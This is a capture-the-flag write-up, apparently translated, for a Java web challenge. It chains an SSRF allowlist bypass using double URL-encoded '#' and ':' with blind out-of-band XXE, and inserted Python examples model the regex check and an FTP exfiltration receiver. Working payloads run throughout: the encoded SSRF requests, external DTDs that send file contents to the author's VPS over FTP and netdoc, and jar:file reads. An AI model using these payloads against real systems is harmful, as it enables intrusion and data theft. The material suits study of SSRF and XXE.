Challenge 1: Darkest Hour
Challenge description:
A Web challenge. Visit:
http://121.36.145.157:8088/
Use whatever technique works to bypass the restrictions and obtain the value stored in flag.txt.
The page shows a single image. Viewing the page source:
```
<html>
<head>
<meta charset="UTF-8">
<title>test</title>
</head>
<body>
<img src="/getimage?url=https://bbs.pediy.com/upload/attach/202009/236762_Y76C73KQC7MG83G.jpg">
<!-- test: load the config file /loadConfig?url=x.xml -->
</body>
</html>
```
There is a commented-out URL:

```
http://121.36.145.157:8088/loadConfig?url=x.xml
```

It looks as if this endpoint fetches a URL of our choosing, but requesting it returns "not allow ip": the client IP is rejected.
I tried X-Forwarded-For to spoof the client IP, sent the request to Burp and brute-forced a range of internal addresses; every one of them came back "not allow ip".
The 192.168.0.0/16 range alone has more than 60,000 addresses, so brute force is clearly not the intended route.
Going back to the page source, the other link, the one that loads the image:

```
http://121.36.145.157:8088/getimage?url=https://bbs.pediy.com/upload/attach/202009/236762_Y76C73KQC7MG83G.jpg
```

also fetches a resource from a URL we supply. Changing the url parameter returns an error message that leaks the regular expression (truncated here as it was captured):

```
illegal url! ^(http|https):\\/\\/[^?
```
So the task is to get past this regex and reach a URL of our choosing.
The regex only accepts URLs of the form:

```
http://{1}.pediy.com/{2}
or
https://{1}.pediy.com/{2}
```

{1} must not contain '?', '#' or '/'
{2} can be anything
Putting a bare '#' in the URL does not pass the regex:
URL-encoding it once still does not pass:
Trying other characters shows that the parameter is URL-decoded once before the regex check, so a single %23 is already a '#' by the time the regex sees it:
Double URL-encoding gets past the check: after that one decode the parameter holds the literal text %23, which contains none of the forbidden characters, and evidently the component that performs the fetch decodes it a second time:
The bypass works; the server went on to request https://127.0.0.1:
I started a web server on my own VPS and pointed the SSRF at it, hoping to learn the target's outbound IP and then use that IP against the first endpoint.
One thing to note: my web server listens on port 5000, and writing the target as http://ip:port fails with "invalid port number" (presumably because after the single decode the "port" is everything between ':' and the next '/', i.e. 5000%23.pediy.com),
so the ':' also has to be double URL-encoded. With that the request succeeded, but the IP my VPS logged was 121.36.145.157:
That is just the challenge host itself. Trying it against /loadConfig?url=x.xml still returns "not allow ip"; dead end.
So I tried using the SSRF to reach http://127.0.0.1:8088/loadConfig?url=x.xml instead, constructing the request:
```
http://121.36.145.157:8088/getimage?url=http://127.0.0.1%253a8088%2523.pediy.com/loadConfig?url=x.xml
```
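As an added illustration (my own model, not the challenge's code), the following Python reproduces the check the way the observations above imply it works: the framework decodes the parameter once, the regex runs on that, and the component that performs the fetch decodes again, which is the only reading under which %2523 survives the check as %23 and becomes '#' afterwards, and under which a single-encoded ':' ends up inside the port. The regex (reconstructed from the leaked fragment), the "fetcher" and its second decode are assumptions; what the challenge's HTTP client did with the '#' fragment is not recorded in the writeup, so the model stops at the host and port the fetcher would connect to.

```python
import re
from urllib.parse import unquote, urlsplit

# Model of the getimage?url= allowlist, reconstructed only from what the
# writeup observed (single-encoded '#' rejected, double-encoded accepted,
# single-encoded ':' -> "invalid port number"). The server wiring below is an
# assumption, not the challenge's source.

# The regex as reconstructed: scheme, then an authority that contains no
# '?', '#' or '/' and ends in .pediy.com, then '/' and anything at all.
ALLOWED = re.compile(r"^(http|https)://[^?#/]*\.pediy\.com/.*")


def validator_view(raw_param: str) -> str:
    """The framework percent-decodes the query parameter once; the regex runs on that."""
    return unquote(raw_param)


def passes_allowlist(raw_param: str) -> bool:
    return ALLOWED.match(validator_view(raw_param)) is not None


def fetcher_view(raw_param: str) -> str:
    """Assumed second decode in the fetching component: this is what has to
    happen for %253a / %2523 to become ':' / '#' only after the check ran."""
    return unquote(validator_view(raw_param))


def fetched_host(raw_param: str):
    """Host and port the fetcher would actually connect to."""
    parts = urlsplit(fetcher_view(raw_param))
    return parts.hostname, parts.port


def build_bypass(target: str) -> str:
    """Wrap http(s)://host[:port]/path?query so that the once-decoded form
    matches ALLOWED while the twice-decoded form points at `target`."""
    p = urlsplit(target)
    # A single %3a would be decoded before URL parsing and everything up to
    # the next '/' would be taken as the port, hence the double encoding.
    authority = p.netloc.replace(":", "%253a")
    tail = p.path or "/"
    if p.query:
        tail += "?" + p.query
    # %2523 -> %23 after one decode (regex-safe text) -> '#' after two
    return f"{p.scheme}://{authority}%2523.pediy.com{tail}"


if __name__ == "__main__":
    for candidate in (
        "http://127.0.0.1:8088#.pediy.com/loadConfig?url=x.xml",        # raw '#'
        "http://127.0.0.1%3a8088%23.pediy.com/loadConfig?url=x.xml",    # encoded once
        build_bypass("http://127.0.0.1:8088/loadConfig?url=x.xml"),     # encoded twice
    ):
        print(passes_allowlist(candidate), fetched_host(candidate), candidate)
```

The lesson generalises beyond this challenge: a validator and its consumer must see the same bytes. Canonicalise once, validate the parsed host (not the string), and hand the parsed structure, not the raw string, to the client that makes the request.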
The response shows the request went through:
Sending it to Burp and experimenting further:
/loadConfig?url=x.xml reads a file from the location given by url and parses it as XML, so the obvious guess is XXE.
I hosted the following payload on my VPS:
```
<!-- t.dtd -->
<?xml version="1.0"?>
<!DOCTYPE r [
<!ELEMENT r ANY>
<!ENTITY sp SYSTEM "file:///etc/issue">
]>
<r>&sp;</r>
```
and constructed the request:

```
/getimage?url=http://127.0.0.1%253a8088%2523.pediy.com/loadConfig?url=http://{my_vps_ip}:5000/t.dtd
```
Nothing of the file came back in the response (blind XXE), so I tried pushing the contents out over FTP instead. Payload:
```
<!-- c.dtd -->
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/issue">
<!ENTITY % sp SYSTEM "http://my_vps_ip:5000/d.dtd">
%sp;
%param3;
%exfil;
]>
=====================================================================
<!-- d.dtd -->
<!-- &#x25; becomes '%' only when param3's replacement text is parsed, so the nested declaration is well-formed -->
<!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'ftp://my_vps_ip:30000/%data3;'>">
```
and started an FTP service on port 30000 of the VPS with this script: https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb
Constructed request:

```
/getimage?url=http://127.0.0.1%253a8088%2523.pediy.com/loadConfig?url=http://my_vps_ip:5000/c.dtd
```

The VPS received the contents of /etc/issue:
But reading files that contain special characters did not get the data out to the VPS (the contents become the path of a URL, and characters a URL or an FTP command line cannot carry break the transfer),
and there was no way to list directories, so no way to find the flag.
I then tried the netdoc protocol (a Java-specific URL handler), which can list directories, with the following payload:
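Added example, not the writeup's code and not ONsec's script: a Python receiver that does the same job as xxe-ftp-server.rb, together with a constructed stand-in for the Java ftp: client so that it runs offline. It shows why the trick works: Java's ftp: handler walks the URL path one component at a time, sending CWD for each directory and RETR for the last segment, so the receiver only has to answer every command with a 2xx code and write down the arguments. The command sequence the stand-in sends, the port numbers and the sample "file contents" are all constructed for the demonstration.

```python
import queue
import socket
import threading

# Minimal "FTP" receiver for XXE out-of-band exfiltration. The payload makes the
# parser open ftp://vps:30000/<file contents>; Java's ftp: handler issues CWD
# for each directory component and RETR for the final one, and the receiver
# reassembles the data from those arguments. Everything here is an added
# example; the command sequence of the simulated client is a constructed
# approximation of Java's behaviour, not a capture.


def reconstruct_path(commands):
    """Rebuild the exfiltrated string from one client's command lines."""
    segments = []
    for line in commands:
        verb, _, arg = line.partition(" ")
        if verb.upper() in ("CWD", "RETR"):
            segments.append(arg)
    return "/".join(segments)


def _reply(conn, code, text):
    conn.sendall(f"{code} {text}\r\n".encode())


def handle_client(conn, captured):
    """Speak just enough FTP that the client keeps walking its path."""
    commands = []
    reader = conn.makefile("rb")
    try:
        _reply(conn, 220, "xxe-ftp-receiver ready")
        for raw in reader:
            cmd = raw.rstrip(b"\r\n").decode("utf-8", "replace")
            commands.append(cmd)
            verb = cmd.split(" ", 1)[0].upper()
            if verb == "USER":
                _reply(conn, 331, "password please")
            elif verb == "QUIT":
                _reply(conn, 221, "bye")
                break
            else:
                # 230 is a 2xx success for every other command (PASS, TYPE,
                # CWD, EPRT, RETR ...), so the client keeps going.
                _reply(conn, 230, "more data please")
    finally:
        reader.close()
        conn.close()
        captured.put(reconstruct_path(commands))


def start_receiver(host="127.0.0.1", port=0):
    """Listen in a background thread; returns (bound_port, queue of results)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)
    captured = queue.Queue()

    def accept_loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handle_client, args=(conn, captured), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1], captured


def simulate_java_ftp_fetch(port, url_path, host="127.0.0.1"):
    """Constructed stand-in for Java opening ftp://host:port/<url_path>:
    login, CWD into each directory component, then the passive/active
    data-connection attempts and RETR for the final component."""
    *dirs, name = url_path.split("/")
    commands = ["USER anonymous", "PASS java@"]
    commands += [f"CWD {d}" for d in dirs]
    commands += ["TYPE I", "EPSV", "PASV", "EPRT |1|127.0.0.1|40001|", f"RETR {name}", "QUIT"]
    with socket.create_connection((host, port), timeout=5) as s:
        rd = s.makefile("rb")
        rd.readline()                      # banner
        for cmd in commands:
            s.sendall((cmd + "\r\n").encode())
            rd.readline()                  # one reply line per command
        rd.close()


if __name__ == "__main__":
    listen_port, results = start_receiver()
    # Constructed sample standing in for what %data3; expands to.
    simulate_java_ftp_fetch(listen_port, "Ubuntu 18.04.5 LTS")
    print(results.get(timeout=5))
```

Because the file contents travel as a URL path and then as FTP command arguments, a '/' in the data simply becomes another CWD and is reassembled here, but a newline or another byte the Java URL and FTP layers refuse to carry stops the transfer before anything reaches the receiver. That is the limitation the writeup runs into with files containing special characters, and the reason it switches to a different protocol handler.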
```
<!-- g.dtd -->
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
<!ENTITY % data3 SYSTEM "netdoc:///">
<!ENTITY % sp SYSTEM "http://my_vps_ip:5000/d.dtd">
%sp;
%param3;
%exfil;
]>
=====================================================================
<!-- d.dtd -->
<!-- &#x25; becomes '%' only when param3's replacement text is parsed, so the nested declaration is well-formed -->
<!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'netdoc://my_vps_ip:80/%data3;'>">
```
Constructed request:

```
/getimage?url=http://127.0.0.1%253a8088%2523.pediy.com/loadConfig?url=http://my_vps_ip:5000/g.dtd
```
The response in Burp now echoes the result, so directories can be listed and files read:
From there it is just listing directories and reading files...
/home contains a few jar files:
Using jar:file: to read inside the jars, I tried the usual locations in a Spring Boot jar
and finally found flag.txt at /BOOT-INF/classes/flag.txt inside vip-demo-0.0.1-SNAPSHOT.jar. Payload:
```
<!-- g.dtd -->
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
<!ENTITY % data3 SYSTEM "jar:file:///home/vip-demo-0.0.1-SNAPSHOT.jar!/BOOT-INF/classes/flag.txt">
<!ENTITY % sp SYSTEM "http://{my_vps_ip}:5000/d.dtd">
%sp;
%param3;
%exfil;
]>
=====================================================================
<!-- d.dtd -->
<!-- &#x25; becomes '%' only when param3's replacement text is parsed, so the nested declaration is well-formed -->
<!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'netdoc://101.37.76.66:80/%data3;'>">
```
Screenshot of the flag:
The flag is flag{congratulations-Path-the-spring-boot}